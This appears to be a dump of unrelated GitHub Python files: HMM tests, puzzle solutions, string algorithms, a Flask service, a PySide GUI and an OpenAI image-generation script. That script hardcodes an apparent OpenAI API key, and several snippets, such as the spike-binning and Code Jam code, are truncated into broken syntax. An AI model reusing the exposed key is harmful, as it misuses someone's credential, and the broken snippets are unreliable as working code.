print(yaml.dump(data=settings_dict, canonical=False))\n\n","repo_name":"JC-Price/DeuteRater-H","sub_path":"deuterater/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":12626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34469306512","text":"import numpy as np\nimport unittest\n\nfrom scipy.special import logsumexp\nfrom dsbox.ml.markov.hmmlearn.base import ConvergenceMonitor, _BaseHMM\n\n\nclass TestMonitor(unittest.TestCase):\n def test_converged_by_iterations(self):\n m = ConvergenceMonitor(tol=1e-3, n_iter=2, verbose=False)\n self.assertFalse(m.converged)\n m.report(-0.01)\n self.assertFalse(m.converged)\n m.report(-0.1)\n self.assertTrue(m.converged)\n\n def test_converged_by_logprob(self):\n m = ConvergenceMonitor(tol=1e-3, n_iter=10, verbose=False)\n for logprob in [-0.03, -0.02, -0.01]:\n m.report(logprob)\n self.assertFalse(m.converged)\n\n m.report(-0.0101)\n self.assertTrue(m.converged)\n\n def test_reset(self):\n m = ConvergenceMonitor(tol=1e-3, n_iter=10, verbose=False)\n m.iter = 1\n m.history.append(-0.01)\n m._reset()\n self.assertEqual(m.iter, 0)\n self.assertFalse(m.history)\n\n\nclass StubHMM(_BaseHMM):\n \"\"\"An HMM with hardcoded observation probabilities.\"\"\"\n\n def _compute_log_likelihood(self, X):\n return self.framelogprob\n\n\nclass TestBaseAgainstWikipedia(unittest.TestCase):\n def setup_method(self):\n # Example from http://en.wikipedia.org/wiki/Forward-backward_algorithm\n self.framelogprob = np.log([[0.9, 0.2],\n [0.9, 0.2],\n [0.1, 0.8],\n [0.9, 0.2],\n [0.9, 0.2]])\n\n h = StubHMM(2)\n h.transmat_ = [[0.7, 0.3], [0.3, 0.7]]\n h.startprob_ = 
[0.5, 0.5]\n        h.framelogprob = self.framelogprob\n        self.hmm = h\n\n    def test_do_forward_pass(self):\n        self.setup_method()\n        logprob, fwdlattice = self.hmm._do_forward_pass(self.framelogprob)\n\n        reflogprob = -3.3725\n        self.assertEqual(np.round(logprob, 4), reflogprob)\n        reffwdlattice = np.array([[0.4500, 0.1000],\n                                  [0.3105, 0.0410],\n                                  [0.0230, 0.0975],\n                                  [0.0408, 0.0150],\n                                  [0.0298, 0.0046]])\n        self.assertTrue(np.allclose(np.exp(fwdlattice), reffwdlattice, atol=1e-4))\n\n    def test_do_backward_pass(self):\n        self.setup_method()\n        bwdlattice = self.hmm._do_backward_pass(self.framelogprob)\n\n        refbwdlattice = np.array([[0.0661, 0.0455],\n                                  [0.0906, 0.1503],\n                                  [0.4593, 0.2437],\n                                  [0.6900, 0.4100],\n                                  [1.0000, 1.0000]])\n        self.assertTrue(np.allclose(np.exp(bwdlattice), refbwdlattice, atol=1e-4))\n\n    def test_do_viterbi_pass(self):\n        self.setup_method()\n        logprob, state_sequence = self.hmm._do_viterbi_pass(self.framelogprob)\n\n        refstate_sequence = [0, 0, 1, 0, 0]\n        self.assertTrue(np.allclose(state_sequence, refstate_sequence))\n\n        reflogprob = -4.4590\n        self.assertEqual(np.round(logprob, 4), reflogprob)\n\n    def test_score_samples(self):\n        self.setup_method()\n        # ``StubHMM`` ignores the values in ``X``, so we just pass in an\n        # array of the appropriate shape.\n        logprob, posteriors = self.hmm.score_samples(self.framelogprob)\n        self.assertTrue(np.allclose(posteriors.sum(axis=1), np.ones(len(posteriors))))\n\n        reflogprob = -3.3725\n        self.assertEqual(np.round(logprob, 4), reflogprob)\n\n        refposteriors = np.array([[0.8673, 0.1327],\n                                  [0.8204, 0.1796],\n                                  [0.3075, 0.6925],\n                                  [0.8204, 0.1796],\n                                  [0.8673, 0.1327]])\n        self.assertTrue(np.allclose(posteriors, refposteriors, atol=1e-4))\n\n\nclass TestBaseConsistentWithGMM(unittest.TestCase):\n    def setup_method(self):\n        self.n_components = 8\n        n_samples = 10\n\n        self.framelogprob = np.log(np.random.random((n_samples, self.n_components)))\n\n        h = StubHMM(self.n_components)\n        h.framelogprob = self.framelogprob\n\n        # If startprob and transmat are uniform across all states (the\n        # default), the transitions are uninformative - the model\n        # reduces to a GMM with uniform mixing weights (in terms of\n        # posteriors, not likelihoods).\n        h.startprob_ = np.ones(self.n_components) / self.n_components\n        h.transmat_ = np.ones((self.n_components, self.n_components)) / self.n_components\n\n        self.hmm = h\n\n    def test_score_samples(self):\n        self.setup_method()\n        logprob, hmmposteriors = self.hmm.score_samples(self.framelogprob)\n\n        n_samples, n_components = self.framelogprob.shape\n        self.assertTrue(np.allclose(hmmposteriors.sum(axis=1), np.ones(n_samples)))\n\n        norm = logsumexp(self.framelogprob, axis=1)[:, np.newaxis]\n        gmmposteriors = np.exp(self.framelogprob - np.tile(norm, (1, self.n_components)))\n        self.assertTrue(np.allclose(hmmposteriors, gmmposteriors))\n\n    def test_decode(self):\n        self.setup_method()\n        _logprob, state_sequence = self.hmm.decode(self.framelogprob)\n\n        n_samples, n_components = self.framelogprob.shape\n        norm = logsumexp(self.framelogprob, axis=1)[:, np.newaxis]\n        gmmposteriors = np.exp(self.framelogprob -\n                               np.tile(norm, (1, n_components)))\n        gmmstate_sequence = gmmposteriors.argmax(axis=1)\n        self.assertTrue(np.allclose(state_sequence, gmmstate_sequence))\n\n\nclass TestHMMAttributes(unittest.TestCase):\n    def test_base_hmm_attributes(self):\n        n_components = 20\n        startprob = np.random.random(n_components)\n        startprob /= startprob.sum()\n        transmat = np.random.random((n_components, n_components))\n        transmat /= np.tile(transmat.sum(axis=1)[:, np.newaxis], (1, 
n_components))\n\n h = StubHMM(n_components)\n\n self.assertEqual(h.n_components, n_components)\n\n h.startprob_ = startprob\n self.assertTrue(np.allclose(h.startprob_, startprob))\n\n with self.assertRaises(ValueError):\n h.startprob_ = 2 * startprob\n h._check()\n with self.assertRaises(ValueError):\n h.startprob_ = []\n h._check()\n with self.assertRaises(ValueError):\n h.startprob_ = np.zeros((n_components - 2, 2))\n h._check()\n\n h.startprob_ = startprob\n h.transmat_ = transmat\n self.assertTrue(np.allclose(h.transmat_, transmat))\n with self.assertRaises(ValueError):\n h.transmat_ = 2 * transmat\n h._check()\n with self.assertRaises(ValueError):\n h.transmat_ = []\n h._check()\n with self.assertRaises(ValueError):\n h.transmat_ = np.zeros((n_components - 2, n_components))\n h._check()\n\n\nclass TestStationaryDistribution(unittest.TestCase):\n def test_stationary_distribution(self):\n n_components = 10\n h = StubHMM(n_components)\n transmat = np.random.random((n_components, n_components))\n transmat /= np.tile(transmat.sum(axis=1)[:, np.newaxis], (1, n_components))\n h.transmat_ = transmat\n stationary = h.get_stationary_distribution()\n self.assertEqual(stationary.dtype, float)\n self.assertListEqual(list(np.round(np.dot(h.get_stationary_distribution().T, h.transmat_), 5)),\n list(np.round(stationary, 5)))\n","repo_name":"vlevorato/dsbox","sub_path":"tests/ml/markov/hmmlearn/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":7534,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"71377243395","text":"in_min=136818\nin_max=685979\n\ndef includes_duplicates(num):\n\tstr_num = str(num)\n\tfor n in range(len(str_num) - 1):\n\t\tif str_num[n] == str_num[n + 1]:\n\t\t\treturn True\n\treturn False\n\ndef monotonic_increase(num):\n\tstr_num = str(num)\n\tfor n in range(len(str_num) - 1):\n\t\tif str_num[n + 1] < str_num[n]:\n\t\t\treturn False\n\treturn True\n\ndef includes_exactly_a_pair(num):\n\tstr_num = str(num)\n\tdigits = []\n\tfor i in range(10):\n\t\ttmp = str_num.count(str(i))\n\t\tif tmp > 1:\n\t\t\tdigits.append(tmp)\n\tfor i in range(len(digits)):\n\t\tif digits[i] == 2:\n\t\t\treturn True\n\treturn False\n\n#print(len(filter(includes_duplicates, filter(monotonic_increase, range(in_min, in_max)))))\nprint(len(filter(includes_exactly_a_pair,filter(monotonic_increase, range(in_min, in_max)))))","repo_name":"IratePirates/AoC2019","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30082153291","text":"'''find all the prime number till N'''\r\nimport math\r\nn=30\r\narr=[1]*(n+1)\r\ni=2\r\nwhile i*i<=n:\r\n\tif arr[i]==1:\r\n\t\tfor j in range((i*i),n+1,i):\r\n\t\t\tarr[j]=0\r\n\ti+=1\r\ncount=0\r\nfor i in arr:\r\n\tif i==1:\r\n\t\tcount+=1\r\nprint(arr)\r\nprint(\"Numbers of prime number in range\",n,\"is\",count)","repo_name":"zvut/CODING-PRACTICE","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73316442433","text":"number=int(input('Enter the range for fibonacci series: '))\n\ndef fibo(n):\n a,b=0,1\n\n if n<0 and n==0:\n print('Error, Give the correct length')\n elif n==1:\n print(a)\n elif n==2:\n print(a,b)\n else:\n print(a,b,end=' ')\n sum=0\n for i in range(n-2):\n sum=a+b\n print(sum,end=' ')\n a=b\n 
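# The forward-pass numbers asserted in the hmmlearn tests above come from
# the classic Wikipedia forward-backward example. A standalone NumPy
# re-derivation (no hmmlearn needed) reproduces reflogprob = -3.3725 and
# the rows of reffwdlattice:
import numpy as np

startprob = np.array([0.5, 0.5])
transmat = np.array([[0.7, 0.3], [0.3, 0.7]])
frameprob = np.array([[0.9, 0.2],
                      [0.9, 0.2],
                      [0.1, 0.8],
                      [0.9, 0.2],
                      [0.9, 0.2]])

alpha = np.zeros_like(frameprob)
alpha[0] = startprob * frameprob[0]  # [0.45, 0.10], first row of the lattice
for t in range(1, len(frameprob)):
    # propagate through the transition matrix, then weight by the emission
    alpha[t] = (alpha[t - 1] @ transmat) * frameprob[t]

print(np.round(alpha, 4))                    # matches reffwdlattice
print(np.round(np.log(alpha[-1].sum()), 4))  # -3.3725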
b=sum\n\nfibo(number)","repo_name":"Gorish25/Collection-of-Python-Programs","sub_path":"23fibonacci.py","file_name":"23fibonacci.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74822296835","text":"import openai\nimport csv\nimport requests\n\n\nwords = []\ndefinitions = []\nsynonyms = []\nstems = []\n\n# with open('Synonyme.csv', \"r\") as csvfile:\n# reader = csv.reader(csvfile)\n# for row in reader:\n# if len(row) >= 2:\n# synonyms.append(row[0])\n\ncolumn_index = 1\nwith open('Synonyme.csv', \"r\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row) >= 2:\n value = row[1].strip()\n synonyms.append(value)\n else:\n synonyms.append(\"\")\n\n\nwith open('Definition.csv', \"r\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if len(row) >= 2:\n words.append(row[0])\n definitions.append(row[1])\n\n\nopenai.api_key = \"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\"\n\ntemp_words = words[1:]\ntemp_def = definitions[1:]\ntemp_synonyms = synonyms[1:]\n\n# print(len(temp_words)) # 3597\n# print(len(temp_def))\n# print(len(temp_synonyms))\n\nfor i in range(3597):\n stems.append(\"Image of \" + temp_words[i] + \" (Style: realism, no text, white background; \" +\n temp_words[i] + \" definition: \" + temp_def[i] + \"; \" + temp_words[i] +\n \" synonyms: \" + temp_synonyms[i])\n\n\n# print(stems[8])\n\n# prompt_stem = \\\n# \"Image of [WORD1] (Style: realistic, no text, white background;\" \\\n# \"[WORD1] definition: x; [WORD1] synonyms: [y, z])\"\n\ntemp_stems = stems[:5]\ncounter = 1\nnum_photo = 2\nexception = []\n\nfor prompt in temp_stems:\n try:\n response = openai.Image.create(\n prompt=prompt,\n n=num_photo, # number of images\n size=\"512x512\" # 256x256, 512x512, 1024x1024 (default)\n )\n for i in range(num_photo):\n image_url = response['data'][i]['url']\n image_data = requests.get(image_url).content\n image_name = \"./Images/\" + str(counter) + \"-\" + str(i+1) + \".jpg\"\n with open(image_name, \"wb\") as f:\n f.write(image_data)\n print(image_name + \" generated\")\n counter += 1\n except Exception as e:\n print(f\"Error with prompt '{prompt}': {e}\")\n exception.append([prompt, e])\n continue\n\n\nwith open('Exception.csv', mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(exception)\n # image_url = response['data'][0]['url']\n # image_data = requests.get(image_url).content\n # with open(\"./Images/\" + str(counter) + \".jpg\", \"wb\") as f:\n # f.write(image_data)","repo_name":"bobaba99/AIimage","sub_path":"imagegen.py","file_name":"imagegen.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18482351305","text":"from db import db\nfrom utils.util import uid\nfrom models.profile_model import ProfileModel\nfrom models.branch_model import BranchModel\nfrom models.address_model import AddressModel\nfrom models.img_model import ImgModel\n\nfrom mappers.profile_mapper import ProfileMapper\nfrom mappers.img_mapper import ImgMapper\nfrom mappers.branch_mapper import BranchMapper\nfrom mappers.address_mapper import AddressMapper\nimport datetime\n\nclass ProfileService:\n\n session_info = None\n\n def mapping(self, model, view):\n print(self.session_info)\n if view.get('id', None) is not None:\n model = ProfileModel.query.filter_by(id=view.get('id')).first()\n if model is None:\n model = ProfileModel()\n 
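# The three-statement shuffle in fibo() above (sum = a + b; a = b; b = sum,
# in the 23fibonacci.py record) is the textbook place for Python's tuple
# assignment, which evaluates the right-hand side before rebinding either
# name. An equivalent sketch:
def fib_sequence(n):
    """Return the first n Fibonacci numbers: 0, 1, 1, 2, 3, ..."""
    a, b = 0, 1
    out = []
    for _ in range(n):
        out.append(a)
        a, b = b, a + b  # no temporary variable needed
    return out


assert fib_sequence(7) == [0, 1, 1, 2, 3, 5, 8]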
model.id = uid()\n # model.branchId = view['branch']['id']\n model.address = AddressModel()\n model.address.id = model.id\n model.address.vid = self.session_info['vid']\n model.img = ImgModel()\n model.img.id = model.id\n\n model.vid = self.session_info['vid']\n model.createdBy = self.session_info['id']\n model.updatedBy = self.session_info['id']\n model.updatedOn = datetime.datetime.now()\n model.createdOn = datetime.datetime.now()\n\n ProfileMapper(model, view).model_mapping()\n AddressMapper(model.address, view.get('address', None)).model_mapping()\n ImgMapper(model.img, view.get('img', None)).model_mapping()\n return model\n\n def save(self, req_data):\n profile = self.mapping(None, req_data)\n db.session.add(profile)\n db.session.commit()\n return {'message': 'Saved Successfully', 'id': profile.id}\n\n\n def search(self):\n print(\"branch service\")\n data_list = ProfileModel.query.all()\n print(data_list[0].__dict__)\n return data_list\n","repo_name":"prasadsrg/python_rest","sub_path":"src/services/profile_service.py","file_name":"profile_service.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41163532848","text":"#!/usr/bin/env python\n# coding: utf-8\n\nevents = {}\n\ndef add(event, func, sync_flag = \"sync\"):\n # sync_flag have 'sync', 'async' values for now\n if event not in events:\n events[event] = {}\n if sync_flag not in events[event]:\n events[event][sync_flag] = []\n events[event][sync_flag].append(func)\n\ndef delete(event):\n if event in events:\n del events[event]\n \ndef delete_all():\n all_events = list_all()\n if (all_events != 'None'):\n for event in all_events:\n delete(event)\n \ndef list_all():\n if len(events) == 0:\n return ['None']\n else:\n return list(events.keys())\n\nasync def async_trigger(event, data): \n sync_flag = \"async\"\n if (len(events) != 0):\n for event in list(events.keys()):\n if sync_flag in events.get(event):\n for func in events.get(event).get(sync_flag):\n await func(data)\n\ndef trigger(event, data): \n sync_flag = \"sync\"\n if (len(events) != 0):\n for event in list(events.keys()):\n if sync_flag in events[event]:\n for func in events[event][sync_flag]:\n func(data)\n","repo_name":"makristi/python_folderwatcher","sub_path":"EventManager.py","file_name":"EventManager.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74229999555","text":"def rabin_karp(pattern, string):\n n = len(string)\n m = len(pattern)\n \n if m > n:\n return False\n \n def encode(char):\n return ord(char) - ord('a')\n \n BASE = 26 # a-z\n MOD = 10**9+7\n \n def get_hash(substr):\n value = 0\n for char in substr:\n value = (value*BASE + encode(char)) % MOD\n return value\n \n pattern_hash = get_hash(pattern)\n target_hash = get_hash(string[:m])\n \n for start in range(-1, n - m):\n end = start + m\n if start > -1:\n target_hash = (target_hash - encode(string[start])*BASE**(m-1)) % MOD \n target_hash = (target_hash*BASE + encode(string[end])) % MOD\n if target_hash == pattern_hash and string[start+1:end+1] == pattern:\n return True\n return False\n\nprint(rabin_karp('abc', 'cacadhsdabc'))\n","repo_name":"leonfoliveira/python-algorithms-and-ds","sub_path":"rabin-karp.py","file_name":"rabin-karp.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
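# The core invariant in rabin_karp() above is the O(1) rolling-hash update:
# subtract the leading character's contribution (encode(c) * BASE**(m-1)),
# shift the window by BASE, and append the new character, all mod MOD.
# A brute-force cross-check of that update rule against direct re-hashing:
def check_rolling_hash(string, m, BASE=26, MOD=10**9 + 7):
    def encode(char):
        return ord(char) - ord('a')

    def direct_hash(substr):
        value = 0
        for char in substr:
            value = (value * BASE + encode(char)) % MOD
        return value

    h = direct_hash(string[:m])
    for start in range(len(string) - m):
        # roll from window [start, start+m) to [start+1, start+m+1)
        h = (h - encode(string[start]) * pow(BASE, m - 1, MOD)) % MOD
        h = (h * BASE + encode(string[start + m])) % MOD
        assert h == direct_hash(string[start + 1:start + m + 1])


check_rolling_hash('cacadhsdabc', 3)  # passes silently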
+{"seq_id":"17472762156","text":"import time\r\n\r\ndef fib(nr):\r\n\ta = 0\r\n\tb = 1\r\n\twhile nr > 0:\r\n\t\tb = a + b\r\n\t\ta = b - a\r\n\t\tnr = nr-1\r\n\r\n\tprint(a)\r\n\t\r\ndef fib_even_or_odd(nr):\r\n\tif nr%3 == 0:\r\n\t\tprint(\"gerade\")\r\n\telse:\r\n\t\tprint(\"ungerade\")\r\n\t\r\n\t\r\n\t\r\n\t\r\nprint(\"ex: (nr,fib_nr), (0,0), (1,1), (2,1), (3,2), (4,3), (5,5), (6,8)\")\t\r\nnr = int(input(\"nr? \"))\r\n\r\nfib_even_or_odd(nr)\r\nfib(nr)\r\n\r\ntime.sleep(10)","repo_name":"simonandreashuber/fibonacci-numbers","sub_path":"fibonacci_numbers/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10443353560","text":"import os\nimport sys\nimport numpy as np\nimport re\n\ndef get_binned_spikes(spks,bin_size=10):\n \"\"\" Takes in spike times of units and returns binned spike\n rates (no smoothing) at specified resolution. Bin size\n is in ms\n \"\"\"\n\n #30 because sampling rate of the ephys is \n maxT = (np.nanmax([np.nanmax(i) for i in spks])/30.)/bin_size\n\n spk_arr = np.zeros([len(spks),int(np.ceil(maxT))])\n for i,u in enumerate(spks):\n spk_arr[i,np.floor(u/30/bin_size).astype(\"int\")[:,0]] = 1\n \n return spk_arr\n\ndef get_port_to_state_map(dat_dict,task_times):\n task1 = []\n task2 = []\n for dp,ds in zip(dat_dict['port'],dat_dict['state']):\n \n if np.any([np.logical_and((dp[2]*1000)>t_[0],(dp[2]*1000)0]\n next_handle_poke = np.min(tmp) +lot\n \n lights_off_DM[int(np.floor(lot/bin_size)):int(np.floor((next_handle_poke)/bin_size))] = 1\n \n return lights_off_DM\n\ndef build_state_DM(port_DM,task_DM,task1_map,task2_map):\n \n task1p = [i[0] for i in task1]\n task1s = [i[1] for i in task1]; task1s = np.array(task1s) - np.min(task1s)\n \n task2p = [i[0] for i in task2]\n task2s = [i[1] for i in task2]; task2s = np.array(task2s) - np.min(task2s)\n \n state_DM_task1 = np.zeros([port_DM.shape[0]+1,port_DM.shape[1]])\n state_DM_task2 = np.zeros([port_DM.shape[0]+1,port_DM.shape[1]])\n\n for t_,col in enumerate(port_DM.T):\n if np.sum(col):\n tmp2 = [int(i) for i in np.where(col)[0]] #which port poked. Loop because sometime 2 ports poked in small window (i.e. 
one from paw and one snout)\n for tmp in tmp2:\n if tmp in task1p:\n state_DM_task1[task1s[task1p.index(tmp)],t_] = 1\n else:\n state_DM_task1[-1,t_] = 1\n\n if tmp in task2p:\n state_DM_task2[task2s[task2p.index(tmp)],t_] = 1\n else:\n state_DM_task2[-1,t_] = 1\n return state_DM_task1,state_DM_task2 \n\ndef get_port_to_state_map(dat_dict,task_times):\n \n task1 = []\n task2 = []\n for dp,ds in zip(dat_dict['port'],dat_dict['state']):\n \n if np.any([np.logical_and((dp[2]*1000)>t_[0],(dp[2]*1000)\",\n to=\"Mona \",\n subject=\"You have {0} new contact(s)\".format(count),\n body=message\n )\n\n self.response.write(message)\n logger.info(\n 'Send daily mail success, {0} new contacts'.format(count))\n\n put_list = []\n for contact in contacts:\n contact.sent = True\n put_list.append(contact)\n\n ndb.put_multi(put_list)\n\n\nclass MailContactHandler(BaseHandler):\n def get(self):\n send_contact_mail(self)\n\n\nclass MailAllHandler(BaseHandler):\n def get(self):\n contacts = Contact.query()\n datetime_handler = lambda obj: obj.isoformat() \\\n if isinstance(obj, datetime) else None\n self.render_json(\n [contact.to_dict() for contact in contacts],\n default=datetime_handler,\n )\n logger.info('Check all {} contact(s)'.format(contacts.count()))\n\n\n# lint_ignore=E712\n","repo_name":"7kfpun/com.getmewrite","sub_path":"handlers/mails.py","file_name":"mails.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70599171076","text":"import calisan\n\nclass BeyazYaka(calisan.Calisan):\n def __init__(self,ad, soyad, tc_no, yas, cinsiyet, uyruk, sektor, tecrube, maas):\n super().__init__(ad, soyad, tc_no, yas, cinsiyet, uyruk, sektor, tecrube, maas)\n self.__tesvikprim=int()\n\n def get_prim(self):\n return self.__tesvikprim\n def set_prim(self,prim):\n self.__tesvikprim=prim\n def zam_hakki(self):\n tecrube = self.getyiltecrube()\n if tecrube < 2:\n self.__yenimaas = int(self.get_maas()) + self.__tesvikprim\n elif tecrube >= 2 and tecrube < 4:\n if self.get_maas() < 15000:\n zam_miktari = ((self.get_maas() % self.get_tecrube()) * 5) + self.__tesvikprim\n self.__yenimaas = int(self.get_maas()) + int(zam_miktari)\n else:\n self.__yenimaas=self.get_maas()\n else:\n if self.get_maas() < 25000:\n zam_miktari = (((self.get_maas() % self.get_tecrube())) * 5) + self.__tesvikprim\n self.__yenimaas = int(self.get_maas()) + int(zam_miktari)\n else:\n self.__yenimaas=self.get_maas()\n\n def get_yenimaas(self):\n self.zam_hakki()\n return int(self.__yenimaas)\n def __str__(self):\n maasbilgisi = self.get_yenimaas()\n text = \"İsim:\" + self.get_ad() + \"\\n\"+\"Soyisim:\" + self.get_soyad() + \"\\n\"+\"Tecrübe (yıl) :\" + str(self.getyiltecrube()) + \"\\n\"+\"Maas:\" + str(maasbilgisi)\n return text","repo_name":"muratkavak/bil104_proje2","sub_path":"beyazyaka.py","file_name":"beyazyaka.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23436102101","text":"\r\n\r\ndef entre():\r\n\tn=int(raw_input())\r\n\tinpute=[[] for i in range(n)]\r\n\toutpute=[[] for i in range(n)]\r\n\tfor j in range(n):\r\n\t\tnb=int(raw_input())\r\n\t\ts=raw_input()\r\n\t\ts=s.split()\r\n\t\tna=[float(i) for i in s]\r\n\t\tss=raw_input()\r\n\t\tss=ss.split()\r\n\t\tnaa=[float(i) for i in ss]\r\n\t\tinpute[j]=[nb,na,naa]\r\n\treturn inpute,outpute\r\n\r\nE,S=entre()\r\n\r\nnb=0\r\nfor T in 
E:\r\n\tnb+=1\r\n\tr=0\r\n\tl=T[0]\r\n\tT[1].sort()\r\n\tT[2].sort()\r\n\tj=0\r\n\ti=0\r\n\tri=0\r\n\tf=l\r\n\twhile iT[2][i]:\r\n\t\t\trj+=1\r\n\t\telse:\r\n\t\t\ti+=1\r\n\tprint(\"Case #\"+str(nb)+\": \"+str(ri)+\" \"+str(rj))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/788.py","file_name":"788.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23563696871","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose:\r\n#\r\n# Author: Tushar Sadana\r\n#\r\n# Created: 08-04-2017\r\n# Copyright: (c) Tushar Sadana 2017\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\ndef checktidy(a):\r\n flag=True\r\n i=0\r\n while ia[i+1]:\r\n flag = False\r\n break\r\n i+=1\r\n\r\n return flag\r\n\r\n\r\ndef largesttidy(n):\r\n\r\n m=int(n)\r\n for i in range(m,0,-1):\r\n a=[]\r\n while i>0:\r\n b=i%10\r\n a.insert(0,b)\r\n i=i/10\r\n\r\n if checktidy(a):\r\n for i in range(0,len(a)):\r\n a[i]=str(a[i])\r\n num=''\r\n for i in range(0,len(a)):\r\n num+=a[i]\r\n\r\n num=int(num)\r\n break\r\n return num\r\n\r\n\r\ndef main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\ninput_file = open('b.in')\r\noutput_file = open('file.out', 'w')\r\ni=0\r\nt=int(input_file.readline())\r\nif t>=1 and t<=100:\r\n for line in input_file:\r\n\r\n answer = largesttidy(line)\r\n\r\n output_file.write(\"Case #{}: {} \".format(i+1, answer))\r\n output_file.write(\"\\n\")\r\n i+=1\r\ninput_file.close()\r\noutput_file.close()\r\n\r\n\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/5146.py","file_name":"5146.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70451770756","text":"\"\"\"\n528. 
Random Pick with Weight\n\"\"\"\n\nfrom typing import List\nfrom random import random\n\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.pre_sum = []\n self.total = 0\n for val in w:\n self.total += val\n self.pre_sum.append(self.total)\n\n def pickIndex(self) -> int:\n pick = self.total * random()\n\n lo, hi = 0, len(self.pre_sum)-1\n while lo < hi:\n md = lo + (hi - lo) // 2\n if pick <= self.pre_sum[md]:\n hi = md\n else:\n lo = md+1\n\n return lo\n","repo_name":"dictator-x/practise_as","sub_path":"algorithm/leetCode/0528_random_pick_with_weight.py","file_name":"0528_random_pick_with_weight.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10009461933","text":"import pprint\nimport numpy as np\nfrom yggdrasil.metaschema.datatypes import get_type_class\n\n\ndef get_test_data(typename):\n r\"\"\"Determine a test data set for the specified type.\n\n Args:\n typename (str): Name of datatype.\n\n Returns:\n object: Example of specified datatype.\n\n \"\"\"\n typeclass = get_type_class(typename)\n return typeclass.get_test_data()\n\n\ndef check_received_data(typename, x_recv):\n r\"\"\"Check that the received message is equivalent to the\n test data for the specified type.\n\n Args:\n typename (str): Name of datatype.\n x_recv (object): Received object.\n\n Raises:\n AssertionError: If the received message is not equivalent\n to the received message.\n\n \"\"\"\n x_sent = get_test_data(typename)\n print('RECEIVED:')\n pprint.pprint(x_recv)\n print('EXPECTED:')\n pprint.pprint(x_sent)\n if isinstance(x_sent, np.ndarray):\n np.testing.assert_array_equal(x_recv, x_sent)\n else:\n assert(x_recv == x_sent)\n","repo_name":"chrishavlin/yggdrasil","sub_path":"tests/examples/types/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"26739623788","text":"import sys\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom handbook import Handbook\nfrom measument_device_app import MeasureDevice\nfrom settings import SettingsTab\n\nclass MainWindow(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Measure device from LAMMI\")\n\n self.label2 = QtWidgets.QLabel(\"Tab 2\")\n self.label3 = QtWidgets.QLabel(\"Tab 3\")\n\n self.layout = QtWidgets.QVBoxLayout()\n self.setLayout(self.layout)\n\n self.tabWigdet = QtWidgets.QTabWidget()\n\n # Constructing the Handbook tab\n # The set up of the file can be found in\n # handbook.py file\n handbook_constructor = Handbook(self.tabWigdet)\n handbook_constructor.construction()\n\n # Constructing the measure tab\n # The set up of the file can be found in\n # measument_device_app file\n measure_constructor = MeasureDevice(self.tabWigdet)\n measure_constructor.construction()\n\n # Other Stuff\n settings = SettingsTab(self.tabWigdet)\n settings.construction()\n\n self.layout.addWidget(self.tabWigdet)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n screen = MainWindow()\n screen.resize(800, 600)\n screen.show()\n\n sys.exit(app.exec_())\n","repo_name":"pieromorais/measure_device","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17625091473","text":"import torch, time, datetime, tqdm, os, cv2\r\nimport torch.nn as nn\r\nimport 
